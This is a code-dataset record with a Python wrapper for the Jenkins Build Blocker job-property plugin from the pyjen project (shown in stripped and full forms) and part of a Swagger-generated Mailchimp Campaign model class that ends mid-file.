2020-07-06T09:46:02.000Z
|
src/pyjen/plugins/buildblocker.py
|
TheFriendlyCoder/pyjen
|
a3d7e8f69cb53f80f627300f8d3aa0d4302a5ac1
|
[
"Apache-2.0"
] | 119
|
2016-09-13T01:39:31.000Z
|
2020-08-31T03:06:19.000Z
|
src/pyjen/plugins/buildblocker.py
|
TheFriendlyCoder/pyjen
|
a3d7e8f69cb53f80f627300f8d3aa0d4302a5ac1
|
[
"Apache-2.0"
] | 3
|
2015-03-17T18:49:22.000Z
|
2019-07-03T14:10:27.000Z
|
"""Interfaces for interacting with Build Blockers job property plugin"""
import xml.etree.ElementTree as ElementTree
from pyjen.utils.xml_plugin import XMLPlugin
class BuildBlockerProperty(XMLPlugin):
"""Wrapper for Build Blocker job properties
https://wiki.jenkins-ci.org/display/JENKINS/Build+Blocker+Plugin
"""
QUEUE_SCAN_TYPES = ("DISABLED", "ALL", "BUILDABLE")
LEVEL_TYPES = ("GLOBAL", "NODE")
@property
def queue_scan(self):
"""str: checks to see whether build blocking scans the build queue or
not. One of BuildBlockerProperty.QUEUE_SCAN_TYPES.
"""
retval = self._root.find("scanQueueFor").text
assert retval in BuildBlockerProperty.QUEUE_SCAN_TYPES
return retval
@queue_scan.setter
@property
def level(self):
"""str: the scope of the blocked job settings. One of
BuildBlockerProperty.LEVEL_TYPES"""
retval = self._root.find("blockLevel").text
assert retval in BuildBlockerProperty.LEVEL_TYPES
return retval
@level.setter
@property
def blockers(self):
"""list (str): list of search criteria for blocking jobs"""
temp = self._root.find("blockingJobs").text
return temp.split()
@blockers.setter
@property
def is_enabled(self):
"""bool: True if these blocking jobs are enabled, False if not"""
temp = self._root.find("useBuildBlocker").text
return temp.lower() == "true"
def enable(self):
"""Enables this set of build blockers"""
node = self._root.find("useBuildBlocker")
node.text = "true"
self.update()
def disable(self):
"""Disables this set of build blockers"""
node = self._root.find("useBuildBlocker")
node.text = "false"
self.update()
# --------------------------------------------------------------- PLUGIN API
@staticmethod
def get_jenkins_plugin_name():
"""str: the name of the Jenkins plugin associated with this PyJen plugin
This static method is used by the PyJen plugin API to associate this
class with a specific Jenkins plugin, as it is encoded in the config.xml
"""
return "hudson.plugins.buildblocker.BuildBlockerProperty"
@classmethod
def instantiate(cls, patterns):
"""Factory method used to instantiate an instance of this plugin
Args:
patterns (list, str):
One or more names or regular expressions for jobs that block the
execution of this one.
Returns:
BuildBlockerProperty:
reference to the newly instantiated object
"""
default_xml = """
<hudson.plugins.buildblocker.BuildBlockerProperty>
<useBuildBlocker>true</useBuildBlocker>
<blockLevel>GLOBAL</blockLevel>
<scanQueueFor>DISABLED</scanQueueFor>
</hudson.plugins.buildblocker.BuildBlockerProperty>"""
root_node = ElementTree.fromstring(default_xml)
jobs_node = ElementTree.SubElement(root_node, "blockingJobs")
if isinstance(patterns, str):
jobs_node.text = patterns
else:
jobs_node.text = " ".join(patterns)
return cls(root_node)
PluginClass = BuildBlockerProperty
if __name__ == "__main__": # pragma: no cover
pass
| 33.904762
| 80
| 0.630852
|
"""Interfaces for interacting with Build Blockers job property plugin"""
import xml.etree.ElementTree as ElementTree
from pyjen.utils.xml_plugin import XMLPlugin
class BuildBlockerProperty(XMLPlugin):
"""Wrapper for Build Blocker job properties
https://wiki.jenkins-ci.org/display/JENKINS/Build+Blocker+Plugin
"""
QUEUE_SCAN_TYPES = ("DISABLED", "ALL", "BUILDABLE")
LEVEL_TYPES = ("GLOBAL", "NODE")
@property
def queue_scan(self):
"""str: checks to see whether build blocking scans the build queue or
not. One of BuildBlockerProperty.QUEUE_SCAN_TYPES.
"""
retval = self._root.find("scanQueueFor").text
assert retval in BuildBlockerProperty.QUEUE_SCAN_TYPES
return retval
@queue_scan.setter
def queue_scan(self, value):
if value not in BuildBlockerProperty.QUEUE_SCAN_TYPES:
raise ValueError(
"Build blocker queue scan may only be one of the following "
"types: " + ",".join(BuildBlockerProperty.QUEUE_SCAN_TYPES))
self._root.find("scanQueueFor").text = value
self.update()
@property
def level(self):
"""str: the scope of the blocked job settings. One of
BuildBlockerProperty.LEVEL_TYPES"""
retval = self._root.find("blockLevel").text
assert retval in BuildBlockerProperty.LEVEL_TYPES
return retval
@level.setter
def level(self, value):
if value not in BuildBlockerProperty.LEVEL_TYPES:
raise ValueError(
"Build blocker scope level may only be one of the following "
"types: " + ",".join(BuildBlockerProperty.LEVEL_TYPES))
self._root.find("blockLevel").text = value
self.update()
@property
def blockers(self):
"""list (str): list of search criteria for blocking jobs"""
temp = self._root.find("blockingJobs").text
return temp.split()
@blockers.setter
def blockers(self, patterns):
node = self._root.find("blockingJobs")
if isinstance(patterns, str):
node.text = patterns
else:
node.text = "\n".join(patterns)
self.update()
@property
def is_enabled(self):
"""bool: True if these blocking jobs are enabled, False if not"""
temp = self._root.find("useBuildBlocker").text
return temp.lower() == "true"
def enable(self):
"""Enables this set of build blockers"""
node = self._root.find("useBuildBlocker")
node.text = "true"
self.update()
def disable(self):
"""Disables this set of build blockers"""
node = self._root.find("useBuildBlocker")
node.text = "false"
self.update()
# --------------------------------------------------------------- PLUGIN API
@staticmethod
def get_jenkins_plugin_name():
"""str: the name of the Jenkins plugin associated with this PyJen plugin
This static method is used by the PyJen plugin API to associate this
class with a specific Jenkins plugin, as it is encoded in the config.xml
"""
return "hudson.plugins.buildblocker.BuildBlockerProperty"
@classmethod
def instantiate(cls, patterns):
"""Factory method used to instantiate an instance of this plugin
Args:
patterns (list, str):
One or more names or regular expressions for jobs that block the
execution of this one.
Returns:
BuildBlockerProperty:
reference to the newly instantiated object
"""
default_xml = """
<hudson.plugins.buildblocker.BuildBlockerProperty>
<useBuildBlocker>true</useBuildBlocker>
<blockLevel>GLOBAL</blockLevel>
<scanQueueFor>DISABLED</scanQueueFor>
</hudson.plugins.buildblocker.BuildBlockerProperty>"""
root_node = ElementTree.fromstring(default_xml)
jobs_node = ElementTree.SubElement(root_node, "blockingJobs")
if isinstance(patterns, str):
jobs_node.text = patterns
else:
jobs_node.text = " ".join(patterns)
return cls(root_node)
PluginClass = BuildBlockerProperty
if __name__ == "__main__": # pragma: no cover
pass
| 848
| 0
| 78
|
57f9052e1cbafb791fa47203f832f9c3230b7a65
| 22,764
|
py
|
Python
|
mailchimp_marketing_asyncio/models/campaign.py
|
john-parton/mailchimp-asyncio
|
3865ca0867bec8f537dc1e3256aa3a160c00f8a2
|
[
"Apache-2.0"
] | null | null | null |
mailchimp_marketing_asyncio/models/campaign.py
|
john-parton/mailchimp-asyncio
|
3865ca0867bec8f537dc1e3256aa3a160c00f8a2
|
[
"Apache-2.0"
] | null | null | null |
mailchimp_marketing_asyncio/models/campaign.py
|
john-parton/mailchimp-asyncio
|
3865ca0867bec8f537dc1e3256aa3a160c00f8a2
|
[
"Apache-2.0"
] | 1
|
2022-03-09T14:52:22.000Z
|
2022-03-09T14:52:22.000Z
|
# coding: utf-8
"""
Mailchimp Marketing API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 3.0.74
Contact: apihelp@mailchimp.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Campaign(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'web_id': 'int',
'parent_campaign_id': 'str',
'type': 'str',
'create_time': 'datetime',
'archive_url': 'str',
'long_archive_url': 'str',
'status': 'str',
'emails_sent': 'int',
'send_time': 'datetime',
'content_type': 'str',
'needs_block_refresh': 'bool',
'resendable': 'bool',
'recipients': 'List3',
'settings': 'CampaignSettings2',
'variate_settings': 'ABTestOptions',
'tracking': 'CampaignTrackingOptions1',
'rss_opts': 'RSSOptions',
'ab_split_opts': 'ABTestingOptions',
'social_card': 'CampaignSocialCard',
'report_summary': 'CampaignReportSummary2',
'delivery_status': 'CampaignDeliveryStatus',
'links': 'list[ResourceLink]'
}
attribute_map = {
'id': 'id',
'web_id': 'web_id',
'parent_campaign_id': 'parent_campaign_id',
'type': 'type',
'create_time': 'create_time',
'archive_url': 'archive_url',
'long_archive_url': 'long_archive_url',
'status': 'status',
'emails_sent': 'emails_sent',
'send_time': 'send_time',
'content_type': 'content_type',
'needs_block_refresh': 'needs_block_refresh',
'resendable': 'resendable',
'recipients': 'recipients',
'settings': 'settings',
'variate_settings': 'variate_settings',
'tracking': 'tracking',
'rss_opts': 'rss_opts',
'ab_split_opts': 'ab_split_opts',
'social_card': 'social_card',
'report_summary': 'report_summary',
'delivery_status': 'delivery_status',
'links': '_links'
}
def __init__(self, id=None, web_id=None, parent_campaign_id=None, type=None, create_time=None, archive_url=None, long_archive_url=None, status=None, emails_sent=None, send_time=None, content_type=None, needs_block_refresh=None, resendable=None, recipients=None, settings=None, variate_settings=None, tracking=None, rss_opts=None, ab_split_opts=None, social_card=None, report_summary=None, delivery_status=None, links=None): # noqa: E501
"""Campaign - a model defined in Swagger""" # noqa: E501
self._id = None
self._web_id = None
self._parent_campaign_id = None
self._type = None
self._create_time = None
self._archive_url = None
self._long_archive_url = None
self._status = None
self._emails_sent = None
self._send_time = None
self._content_type = None
self._needs_block_refresh = None
self._resendable = None
self._recipients = None
self._settings = None
self._variate_settings = None
self._tracking = None
self._rss_opts = None
self._ab_split_opts = None
self._social_card = None
self._report_summary = None
self._delivery_status = None
self._links = None
self.discriminator = None
if id is not None:
self.id = id
if web_id is not None:
self.web_id = web_id
if parent_campaign_id is not None:
self.parent_campaign_id = parent_campaign_id
if type is not None:
self.type = type
if create_time is not None:
self.create_time = create_time
if archive_url is not None:
self.archive_url = archive_url
if long_archive_url is not None:
self.long_archive_url = long_archive_url
if status is not None:
self.status = status
if emails_sent is not None:
self.emails_sent = emails_sent
if send_time is not None:
self.send_time = send_time
if content_type is not None:
self.content_type = content_type
if needs_block_refresh is not None:
self.needs_block_refresh = needs_block_refresh
if resendable is not None:
self.resendable = resendable
if recipients is not None:
self.recipients = recipients
if settings is not None:
self.settings = settings
if variate_settings is not None:
self.variate_settings = variate_settings
if tracking is not None:
self.tracking = tracking
if rss_opts is not None:
self.rss_opts = rss_opts
if ab_split_opts is not None:
self.ab_split_opts = ab_split_opts
if social_card is not None:
self.social_card = social_card
if report_summary is not None:
self.report_summary = report_summary
if delivery_status is not None:
self.delivery_status = delivery_status
if links is not None:
self.links = links
@property
def id(self):
"""Gets the id of this Campaign. # noqa: E501
A string that uniquely identifies this campaign. # noqa: E501
:return: The id of this Campaign. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Campaign.
A string that uniquely identifies this campaign. # noqa: E501
:param id: The id of this Campaign. # noqa: E501
:type: str
"""
self._id = id
@property
def web_id(self):
"""Gets the web_id of this Campaign. # noqa: E501
The ID used in the Mailchimp web application. View this campaign in your Mailchimp account at `https://{dc}.admin.mailchimp.com/campaigns/show/?id={web_id}`. # noqa: E501
:return: The web_id of this Campaign. # noqa: E501
:rtype: int
"""
return self._web_id
@web_id.setter
def web_id(self, web_id):
"""Sets the web_id of this Campaign.
The ID used in the Mailchimp web application. View this campaign in your Mailchimp account at `https://{dc}.admin.mailchimp.com/campaigns/show/?id={web_id}`. # noqa: E501
:param web_id: The web_id of this Campaign. # noqa: E501
:type: int
"""
self._web_id = web_id
@property
def parent_campaign_id(self):
"""Gets the parent_campaign_id of this Campaign. # noqa: E501
If this campaign is the child of another campaign, this identifies the parent campaign. For Example, for RSS or Automation children. # noqa: E501
:return: The parent_campaign_id of this Campaign. # noqa: E501
:rtype: str
"""
return self._parent_campaign_id
@parent_campaign_id.setter
def parent_campaign_id(self, parent_campaign_id):
"""Sets the parent_campaign_id of this Campaign.
If this campaign is the child of another campaign, this identifies the parent campaign. For Example, for RSS or Automation children. # noqa: E501
:param parent_campaign_id: The parent_campaign_id of this Campaign. # noqa: E501
:type: str
"""
self._parent_campaign_id = parent_campaign_id
@property
def type(self):
"""Gets the type of this Campaign. # noqa: E501
There are four types of [campaigns](https://mailchimp.com/help/getting-started-with-campaigns/) you can create in Mailchimp. A/B Split campaigns have been deprecated and variate campaigns should be used instead. # noqa: E501
:return: The type of this Campaign. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this Campaign.
There are four types of [campaigns](https://mailchimp.com/help/getting-started-with-campaigns/) you can create in Mailchimp. A/B Split campaigns have been deprecated and variate campaigns should be used instead. # noqa: E501
:param type: The type of this Campaign. # noqa: E501
:type: str
"""
allowed_values = ["regular", "plaintext", "absplit", "rss", "variate"] # noqa: E501
if type not in allowed_values:
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def create_time(self):
"""Gets the create_time of this Campaign. # noqa: E501
The date and time the campaign was created in ISO 8601 format. # noqa: E501
:return: The create_time of this Campaign. # noqa: E501
:rtype: datetime
"""
return self._create_time
@create_time.setter
def create_time(self, create_time):
"""Sets the create_time of this Campaign.
The date and time the campaign was created in ISO 8601 format. # noqa: E501
:param create_time: The create_time of this Campaign. # noqa: E501
:type: datetime
"""
self._create_time = create_time
@property
def archive_url(self):
"""Gets the archive_url of this Campaign. # noqa: E501
The link to the campaign's archive version in ISO 8601 format. # noqa: E501
:return: The archive_url of this Campaign. # noqa: E501
:rtype: str
"""
return self._archive_url
@archive_url.setter
def archive_url(self, archive_url):
"""Sets the archive_url of this Campaign.
The link to the campaign's archive version in ISO 8601 format. # noqa: E501
:param archive_url: The archive_url of this Campaign. # noqa: E501
:type: str
"""
self._archive_url = archive_url
@property
def long_archive_url(self):
"""Gets the long_archive_url of this Campaign. # noqa: E501
The original link to the campaign's archive version. # noqa: E501
:return: The long_archive_url of this Campaign. # noqa: E501
:rtype: str
"""
return self._long_archive_url
@long_archive_url.setter
def long_archive_url(self, long_archive_url):
"""Sets the long_archive_url of this Campaign.
The original link to the campaign's archive version. # noqa: E501
:param long_archive_url: The long_archive_url of this Campaign. # noqa: E501
:type: str
"""
self._long_archive_url = long_archive_url
@property
def status(self):
"""Gets the status of this Campaign. # noqa: E501
The current status of the campaign. # noqa: E501
:return: The status of this Campaign. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Campaign.
The current status of the campaign. # noqa: E501
:param status: The status of this Campaign. # noqa: E501
:type: str
"""
allowed_values = ["save", "paused", "schedule", "sending", "sent", "canceled", "canceling", "archived"] # noqa: E501
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
@property
def emails_sent(self):
"""Gets the emails_sent of this Campaign. # noqa: E501
The total number of emails sent for this campaign. # noqa: E501
:return: The emails_sent of this Campaign. # noqa: E501
:rtype: int
"""
return self._emails_sent
@emails_sent.setter
def emails_sent(self, emails_sent):
"""Sets the emails_sent of this Campaign.
The total number of emails sent for this campaign. # noqa: E501
:param emails_sent: The emails_sent of this Campaign. # noqa: E501
:type: int
"""
self._emails_sent = emails_sent
@property
def send_time(self):
"""Gets the send_time of this Campaign. # noqa: E501
The date and time a campaign was sent. # noqa: E501
:return: The send_time of this Campaign. # noqa: E501
:rtype: datetime
"""
return self._send_time
@send_time.setter
def send_time(self, send_time):
"""Sets the send_time of this Campaign.
The date and time a campaign was sent. # noqa: E501
:param send_time: The send_time of this Campaign. # noqa: E501
:type: datetime
"""
self._send_time = send_time
@property
def content_type(self):
"""Gets the content_type of this Campaign. # noqa: E501
How the campaign's content is put together. # noqa: E501
:return: The content_type of this Campaign. # noqa: E501
:rtype: str
"""
return self._content_type
@content_type.setter
def content_type(self, content_type):
"""Sets the content_type of this Campaign.
How the campaign's content is put together. # noqa: E501
:param content_type: The content_type of this Campaign. # noqa: E501
:type: str
"""
allowed_values = ["template", "html", "url", "multichannel"] # noqa: E501
if content_type not in allowed_values:
raise ValueError(
"Invalid value for `content_type` ({0}), must be one of {1}" # noqa: E501
.format(content_type, allowed_values)
)
self._content_type = content_type
@property
def needs_block_refresh(self):
"""Gets the needs_block_refresh of this Campaign. # noqa: E501
Determines if the campaign needs its blocks refreshed by opening the web-based campaign editor. Deprecated and will always return false. # noqa: E501
:return: The needs_block_refresh of this Campaign. # noqa: E501
:rtype: bool
"""
return self._needs_block_refresh
@needs_block_refresh.setter
def needs_block_refresh(self, needs_block_refresh):
"""Sets the needs_block_refresh of this Campaign.
Determines if the campaign needs its blocks refreshed by opening the web-based campaign editor. Deprecated and will always return false. # noqa: E501
:param needs_block_refresh: The needs_block_refresh of this Campaign. # noqa: E501
:type: bool
"""
self._needs_block_refresh = needs_block_refresh
@property
def resendable(self):
"""Gets the resendable of this Campaign. # noqa: E501
Determines if the campaign qualifies to be resent to non-openers. # noqa: E501
:return: The resendable of this Campaign. # noqa: E501
:rtype: bool
"""
return self._resendable
@resendable.setter
def resendable(self, resendable):
"""Sets the resendable of this Campaign.
Determines if the campaign qualifies to be resent to non-openers. # noqa: E501
:param resendable: The resendable of this Campaign. # noqa: E501
:type: bool
"""
self._resendable = resendable
@property
def recipients(self):
"""Gets the recipients of this Campaign. # noqa: E501
:return: The recipients of this Campaign. # noqa: E501
:rtype: List3
"""
return self._recipients
@recipients.setter
def recipients(self, recipients):
"""Sets the recipients of this Campaign.
:param recipients: The recipients of this Campaign. # noqa: E501
:type: List3
"""
self._recipients = recipients
@property
def settings(self):
"""Gets the settings of this Campaign. # noqa: E501
:return: The settings of this Campaign. # noqa: E501
:rtype: CampaignSettings2
"""
return self._settings
@settings.setter
def settings(self, settings):
"""Sets the settings of this Campaign.
:param settings: The settings of this Campaign. # noqa: E501
:type: CampaignSettings2
"""
self._settings = settings
@property
def variate_settings(self):
"""Gets the variate_settings of this Campaign. # noqa: E501
:return: The variate_settings of this Campaign. # noqa: E501
:rtype: ABTestOptions
"""
return self._variate_settings
@variate_settings.setter
def variate_settings(self, variate_settings):
"""Sets the variate_settings of this Campaign.
:param variate_settings: The variate_settings of this Campaign. # noqa: E501
:type: ABTestOptions
"""
self._variate_settings = variate_settings
@property
def tracking(self):
"""Gets the tracking of this Campaign. # noqa: E501
:return: The tracking of this Campaign. # noqa: E501
:rtype: CampaignTrackingOptions1
"""
return self._tracking
@tracking.setter
def tracking(self, tracking):
"""Sets the tracking of this Campaign.
:param tracking: The tracking of this Campaign. # noqa: E501
:type: CampaignTrackingOptions1
"""
self._tracking = tracking
@property
def rss_opts(self):
"""Gets the rss_opts of this Campaign. # noqa: E501
:return: The rss_opts of this Campaign. # noqa: E501
:rtype: RSSOptions
"""
return self._rss_opts
@rss_opts.setter
def rss_opts(self, rss_opts):
"""Sets the rss_opts of this Campaign.
:param rss_opts: The rss_opts of this Campaign. # noqa: E501
:type: RSSOptions
"""
self._rss_opts = rss_opts
@property
def ab_split_opts(self):
"""Gets the ab_split_opts of this Campaign. # noqa: E501
:return: The ab_split_opts of this Campaign. # noqa: E501
:rtype: ABTestingOptions
"""
return self._ab_split_opts
@ab_split_opts.setter
def ab_split_opts(self, ab_split_opts):
"""Sets the ab_split_opts of this Campaign.
:param ab_split_opts: The ab_split_opts of this Campaign. # noqa: E501
:type: ABTestingOptions
"""
self._ab_split_opts = ab_split_opts
@property
def social_card(self):
"""Gets the social_card of this Campaign. # noqa: E501
:return: The social_card of this Campaign. # noqa: E501
:rtype: CampaignSocialCard
"""
return self._social_card
@social_card.setter
def social_card(self, social_card):
"""Sets the social_card of this Campaign.
:param social_card: The social_card of this Campaign. # noqa: E501
:type: CampaignSocialCard
"""
self._social_card = social_card
@property
def report_summary(self):
"""Gets the report_summary of this Campaign. # noqa: E501
:return: The report_summary of this Campaign. # noqa: E501
:rtype: CampaignReportSummary2
"""
return self._report_summary
@report_summary.setter
def report_summary(self, report_summary):
"""Sets the report_summary of this Campaign.
:param report_summary: The report_summary of this Campaign. # noqa: E501
:type: CampaignReportSummary2
"""
self._report_summary = report_summary
@property
def delivery_status(self):
"""Gets the delivery_status of this Campaign. # noqa: E501
:return: The delivery_status of this Campaign. # noqa: E501
:rtype: CampaignDeliveryStatus
"""
return self._delivery_status
@delivery_status.setter
def delivery_status(self, delivery_status):
"""Sets the delivery_status of this Campaign.
:param delivery_status: The delivery_status of this Campaign. # noqa: E501
:type: CampaignDeliveryStatus
"""
self._delivery_status = delivery_status
@property
def links(self):
"""Gets the links of this Campaign. # noqa: E501
A list of link types and descriptions for the API schema documents. # noqa: E501
:return: The links of this Campaign. # noqa: E501
:rtype: list[ResourceLink]
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this Campaign.
A list of link types and descriptions for the API schema documents. # noqa: E501
:param links: The links of this Campaign. # noqa: E501
:type: list[ResourceLink]
"""
self._links = links
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Campaign, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Campaign):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 31.013624
| 441
| 0.61158
|
# coding: utf-8
"""
Mailchimp Marketing API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 3.0.74
Contact: apihelp@mailchimp.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Campaign(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'web_id': 'int',
'parent_campaign_id': 'str',
'type': 'str',
'create_time': 'datetime',
'archive_url': 'str',
'long_archive_url': 'str',
'status': 'str',
'emails_sent': 'int',
'send_time': 'datetime',
'content_type': 'str',
'needs_block_refresh': 'bool',
'resendable': 'bool',
'recipients': 'List3',
'settings': 'CampaignSettings2',
'variate_settings': 'ABTestOptions',
'tracking': 'CampaignTrackingOptions1',
'rss_opts': 'RSSOptions',
'ab_split_opts': 'ABTestingOptions',
'social_card': 'CampaignSocialCard',
'report_summary': 'CampaignReportSummary2',
'delivery_status': 'CampaignDeliveryStatus',
'links': 'list[ResourceLink]'
}
attribute_map = {
'id': 'id',
'web_id': 'web_id',
'parent_campaign_id': 'parent_campaign_id',
'type': 'type',
'create_time': 'create_time',
'archive_url': 'archive_url',
'long_archive_url': 'long_archive_url',
'status': 'status',
'emails_sent': 'emails_sent',
'send_time': 'send_time',
'content_type': 'content_type',
'needs_block_refresh': 'needs_block_refresh',
'resendable': 'resendable',
'recipients': 'recipients',
'settings': 'settings',
'variate_settings': 'variate_settings',
'tracking': 'tracking',
'rss_opts': 'rss_opts',
'ab_split_opts': 'ab_split_opts',
'social_card': 'social_card',
'report_summary': 'report_summary',
'delivery_status': 'delivery_status',
'links': '_links'
}
def __init__(self, id=None, web_id=None, parent_campaign_id=None, type=None, create_time=None, archive_url=None, long_archive_url=None, status=None, emails_sent=None, send_time=None, content_type=None, needs_block_refresh=None, resendable=None, recipients=None, settings=None, variate_settings=None, tracking=None, rss_opts=None, ab_split_opts=None, social_card=None, report_summary=None, delivery_status=None, links=None): # noqa: E501
"""Campaign - a model defined in Swagger""" # noqa: E501
self._id = None
self._web_id = None
self._parent_campaign_id = None
self._type = None
self._create_time = None
self._archive_url = None
self._long_archive_url = None
self._status = None
self._emails_sent = None
self._send_time = None
self._content_type = None
self._needs_block_refresh = None
self._resendable = None
self._recipients = None
self._settings = None
self._variate_settings = None
self._tracking = None
self._rss_opts = None
self._ab_split_opts = None
self._social_card = None
self._report_summary = None
self._delivery_status = None
self._links = None
self.discriminator = None
if id is not None:
self.id = id
if web_id is not None:
self.web_id = web_id
if parent_campaign_id is not None:
self.parent_campaign_id = parent_campaign_id
if type is not None:
self.type = type
if create_time is not None:
self.create_time = create_time
if archive_url is not None:
self.archive_url = archive_url
if long_archive_url is not None:
self.long_archive_url = long_archive_url
if status is not None:
self.status = status
if emails_sent is not None:
self.emails_sent = emails_sent
if send_time is not None:
self.send_time = send_time
if content_type is not None:
self.content_type = content_type
if needs_block_refresh is not None:
self.needs_block_refresh = needs_block_refresh
if resendable is not None:
self.resendable = resendable
if recipients is not None:
self.recipients = recipients
if settings is not None:
self.settings = settings
if variate_settings is not None:
self.variate_settings = variate_settings
if tracking is not None:
self.tracking = tracking
if rss_opts is not None:
self.rss_opts = rss_opts
if ab_split_opts is not None:
self.ab_split_opts = ab_split_opts
if social_card is not None:
self.social_card = social_card
if report_summary is not None:
self.report_summary = report_summary
if delivery_status is not None:
self.delivery_status = delivery_status
if links is not None:
self.links = links
@property
def id(self):
"""Gets the id of this Campaign. # noqa: E501
A string that uniquely identifies this campaign. # noqa: E501
:return: The id of this Campaign. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Campaign.
A string that uniquely identifies this campaign. # noqa: E501
:param id: The id of this Campaign. # noqa: E501
:type: str
"""
self._id = id
@property
def web_id(self):
"""Gets the web_id of this Campaign. # noqa: E501
The ID used in the Mailchimp web application. View this campaign in your Mailchimp account at `https://{dc}.admin.mailchimp.com/campaigns/show/?id={web_id}`. # noqa: E501
:return: The web_id of this Campaign. # noqa: E501
:rtype: int
"""
return self._web_id
@web_id.setter
def web_id(self, web_id):
"""Sets the web_id of this Campaign.
The ID used in the Mailchimp web application. View this campaign in your Mailchimp account at `https://{dc}.admin.mailchimp.com/campaigns/show/?id={web_id}`. # noqa: E501
:param web_id: The web_id of this Campaign. # noqa: E501
:type: int
"""
self._web_id = web_id
@property
def parent_campaign_id(self):
"""Gets the parent_campaign_id of this Campaign. # noqa: E501
If this campaign is the child of another campaign, this identifies the parent campaign. For Example, for RSS or Automation children. # noqa: E501
:return: The parent_campaign_id of this Campaign. # noqa: E501
:rtype: str
"""
return self._parent_campaign_id
@parent_campaign_id.setter
def parent_campaign_id(self, parent_campaign_id):
"""Sets the parent_campaign_id of this Campaign.
If this campaign is the child of another campaign, this identifies the parent campaign. For Example, for RSS or Automation children. # noqa: E501
:param parent_campaign_id: The parent_campaign_id of this Campaign. # noqa: E501
:type: str
"""
self._parent_campaign_id = parent_campaign_id
@property
def type(self):
"""Gets the type of this Campaign. # noqa: E501
There are four types of [campaigns](https://mailchimp.com/help/getting-started-with-campaigns/) you can create in Mailchimp. A/B Split campaigns have been deprecated and variate campaigns should be used instead. # noqa: E501
:return: The type of this Campaign. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this Campaign.
There are four types of [campaigns](https://mailchimp.com/help/getting-started-with-campaigns/) you can create in Mailchimp. A/B Split campaigns have been deprecated and variate campaigns should be used instead. # noqa: E501
:param type: The type of this Campaign. # noqa: E501
:type: str
"""
allowed_values = ["regular", "plaintext", "absplit", "rss", "variate"] # noqa: E501
if type not in allowed_values:
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def create_time(self):
"""Gets the create_time of this Campaign. # noqa: E501
The date and time the campaign was created in ISO 8601 format. # noqa: E501
:return: The create_time of this Campaign. # noqa: E501
:rtype: datetime
"""
return self._create_time
@create_time.setter
def create_time(self, create_time):
"""Sets the create_time of this Campaign.
The date and time the campaign was created in ISO 8601 format. # noqa: E501
:param create_time: The create_time of this Campaign. # noqa: E501
:type: datetime
"""
self._create_time = create_time
@property
def archive_url(self):
"""Gets the archive_url of this Campaign. # noqa: E501
The link to the campaign's archive version in ISO 8601 format. # noqa: E501
:return: The archive_url of this Campaign. # noqa: E501
:rtype: str
"""
return self._archive_url
@archive_url.setter
def archive_url(self, archive_url):
"""Sets the archive_url of this Campaign.
The link to the campaign's archive version in ISO 8601 format. # noqa: E501
:param archive_url: The archive_url of this Campaign. # noqa: E501
:type: str
"""
self._archive_url = archive_url
@property
def long_archive_url(self):
"""Gets the long_archive_url of this Campaign. # noqa: E501
The original link to the campaign's archive version. # noqa: E501
:return: The long_archive_url of this Campaign. # noqa: E501
:rtype: str
"""
return self._long_archive_url
@long_archive_url.setter
def long_archive_url(self, long_archive_url):
"""Sets the long_archive_url of this Campaign.
The original link to the campaign's archive version. # noqa: E501
:param long_archive_url: The long_archive_url of this Campaign. # noqa: E501
:type: str
"""
self._long_archive_url = long_archive_url
@property
def status(self):
"""Gets the status of this Campaign. # noqa: E501
The current status of the campaign. # noqa: E501
:return: The status of this Campaign. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Campaign.
The current status of the campaign. # noqa: E501
:param status: The status of this Campaign. # noqa: E501
:type: str
"""
allowed_values = ["save", "paused", "schedule", "sending", "sent", "canceled", "canceling", "archived"] # noqa: E501
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
@property
def emails_sent(self):
"""Gets the emails_sent of this Campaign. # noqa: E501
The total number of emails sent for this campaign. # noqa: E501
:return: The emails_sent of this Campaign. # noqa: E501
:rtype: int
"""
